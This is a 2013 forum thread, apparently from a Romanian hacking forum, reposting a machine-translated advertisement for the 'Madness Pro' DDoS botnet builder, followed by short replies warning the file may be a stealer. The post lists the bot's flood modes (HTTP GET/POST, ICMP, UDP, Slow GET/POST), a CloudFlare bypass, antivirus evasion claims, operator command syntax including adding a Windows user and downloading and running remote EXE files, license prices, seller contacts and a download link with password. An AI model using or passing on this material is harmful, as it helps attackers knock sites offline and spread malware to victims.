lindic Posted December 2, 2013 Report Posted December 2, 2013 ------------------------------------------------------------------------------------------------------------------------------ Madness Pro DDoS Bot v1.13 Builder by NoNh------------------------------------------------------------------------------------------------------------------------------ Translated by google------------------------------------------------------------------------------------------------------------------------------Madness PROHistory :In the summer of 2012 we started thinking about creating a fundamentally new DDoSbot to test their own web resources on the fault-tolerance, since none of the systemstested did not deserve to even estimate "4".The test samples during devoured memory load on the CPU local machine flew witherrors, freezes on 50 % capacity CPU, making wrong entries in the registry , causingactivation of protective systems , many weighty error was found in the control panels.To create your own system, we have studied in detail : BlackEnergy ( source code ),gbot ( disassembling ), DirtJumper ( disassembling ), Darkness Optima ( source code,purchased under the contract ), iBot ( source code , purchased under the contract ),w3Bot ( source) , were also studied the source code of Zeus and many other programs.capabilities- Written in C + +, easily crypt is lightweight (compressed sample < 15KB )- Full compatibility with all Windows family of NT (x86 and x64)- Boat has 7 types of attacks- Stability in the system. Indicators load on the CPU and RAM are very uniform .- Do not attracted the attention of UAC and Windows Firewall- Able to establish port, referal and cookies individually for each goal- Supports up to 10 targets simultaneously- Has a very low load on the CPU with the new , complex system of parsing commands (all analogs parsing takes place inside a function in multiple threads - it's extra work load on the processor . New bot enters all data in the array before the attack on the function and come ready options address, port , referral , etc.)- Has an enormous power output of more than 1500 http ( and more 30000 UDP) queries per minute through direct interaction with the network drivers , even on desktop Windows! (only using WinSock) is about 10 times more than some few analogs and more top ( on this parameter ) competitors.- In the control panel are : the number of requests per minute , right in the system, the version of the system.- Supports bypass CloudFlare protection ( !) And many other more common.- Supports Slow GET and Slow POST modes !- In the packet header specifies disabling the cache (Cache-Control: no-cache), which increases the load on the server .- The protection of dialogue bot panel spetsklyuchemDetection:checking build (without crypt and packaging ), only 3 out of all the anti-virus gave asuspicion (AVIRA, ClamAV, VBA32). During the test key local AV : Kaspersky, Nod32,DrWeb, Avast missed a file in 100 % of cases.Modes of attack and the teamSince the system is a professional syntax commands that look like Darkness.dd1 basic mode of operation via HTTP protocol using GET, using sokkety.Supports *** cookies and $ $ $ ref and allows for up to 10 targets simultaneously (separated by " ;").The fastest search volume attack.Example : dd1 = http://ya.ru *** cookies $ $ $ referal; http://mail.ru *** cookies2 $ $ $ referal2dd2 same treatment as dd1, only the method POST.Added optional parameter @ @ @ post_data.It is also support for up to 10 targets.Example : dd2 = http://forum.ru/index.php *** cookies $ $ $ referal @ @ @ login = yyy & password = hhhdd3 attack on the HTTP GET method using a system library WinInet.dll.Good old attack that is used in many Delphi bots .Slow due to the limitations of Microsoft Windows.Does not support referral and cookies , supports up to 10 targets.Example : dd3 = http://host.com/script.phpdd4 attack via HTTP POST method using the system library WinInet. Same as dd3, only POST. Example:dd4 = http://host.com/script.php @ @ @ @ @ @ login = yyy & password = hhhdd5 ICMP attack ( pings ) . Supports up to 10 targets.Example dd5 = 198.168.0.1; 199.0.0.1dd6 UDP attack . Supports up to 10 targets . Required parameters : port , and text.Example : dd6 = 192.168.0.2:27015 @ @ @ flud_textdd7 attack on the HTTP GET method using a system library URMON.dllAverage speed attack that supports up to 10 targets and do not support cookies and referalcfa command to bypass the protection CloudFlare (!). ONLY used during dd7.Not ostavnavlivaet the command dd7.The point is simpleThe bot executes java script gets the desired cookie and believes CloudFlare requests made by authorized dd7.Example : dd7 = http://site.ru/index.php, then (after fifteen minutes ) cfa = http://site.ru/index.phpcmd command is executed on the command interpreter cmd.exe on the local machine.Does not stop the execution of other commands.Example : cmd = net user goodwin / addexe command to load and run the EXE file.Does not stop the execution of other commands.The file is saved under the same name, under which he had been on the internet.Made three attempts to download the file.Example : exe = http://site.com/filename.exeControl Panel :We used a 70% modified of another product (purchased under a contract for change and resale ) by rewriting it almost completely, as it was found too many mistakes and did not like the code . Of course everything was corrected and optimized - New PU Enjoy !Prices:- Test License $ 0 ( only for checking the forums and testers. Updates are not provided )- Basic License $ 500 (upgrade / Rebuild $ 50 upgrade to the new version $ 100 , the price of modules will be installed later)- $ 950 full license ( all upgrades, rebuilds and modules are free)Protection bypass CloudFlare.CloudFlare security complex is based on the determination of the browser by running Java script in it,after which the client is issued a unique cookies.Both, like the browser can theoretically run Java Script . The great difficulty is to fit the required amountof mathematical functions in the modest size of the build bot , however, some instances of coping with the task !Consider the example of a test server http://server.com, protected by CloudFlare complex + + Madness 1.08:1) A botnet command is given dd7 = http://server.com, then start rekvest to the server using the system library UrlMon.As can be seen on the server logs and sniffer , 302 bots error is returned , which means job security .2) A botnet command is given cga = http://server.com cookies and bots request for authorization.Java script executing each bot has a unique (for its ip and useragent) cookie which immediately includes the packet header.According to the logs can be seen that the requests to the server are in normal mode and returns the content of the website corresponds to the content on it!Q) Why can not I do it automatically?A) Depending on the security settings, cookie can be changed in an arbitrary interval and authorization need to go again.So far, the automation can not cope with it as it makes a person a professional . Too frequent inspection interval greatlyreduces the usability of the site , as ordinary users see every single swing CloudFlare seconds.Q) Can I use this method all the time, for any purpose ?A) It is possible, but not recommended. Since dd7 itself is a slow attack , compared with dd1, and then there's the load isincreased due to the preparation of the special package to bypass the protection .News of the projectFrom today, we are working with another Celler Sales: iSupport (709186)ICQ: 902300, 903400, 709186JAB: damrai13@jabber.ru------------------------------------------------------------------------------------------------------------------------------Note : inc\config.php has to be writeableNote 2 : Panel is modded Darkness (Optima) by myself (no RU language), if you have original one for madness please send it over ... ------------------------------------------------------------------------------------------------------------------------------Download : herePassword : TrojanForge.coRAR MD5 : 59F2BE414251F898D14FECC46827AD0BBuilder MD5 : AE9F83A4E03D6D8977FD56744C1988DD Quote
vipul666 Posted December 8, 2013 Report Posted December 8, 2013 Ba ce darnici sunt astea cu cate 2 posturi , cu programul iti da flood de ramai fara conturiBafta copiii Quote
lindic Posted December 10, 2013 Author Report Posted December 10, 2013 Ba ce darnici sunt astea cu cate 2 posturi , cu programul iti da flood de ramai fara conturiBafta copiiiVai de plm, nu ti se pare cam ilogica fraza asta ? Quote
aelius Posted December 10, 2013 Report Posted December 10, 2013 (edited) Vai de plm, nu ti se pare cam ilogica fraza asta ?Se refera la faptul ca utilizatorul ce a deschis threadul (adica tu) nu este de incredere iar aplicatia postata este un stealer.Tie nu iti pare ilogic sa ai username clitoris pe un forum IT ? Edited December 10, 2013 by aelius 1 Quote
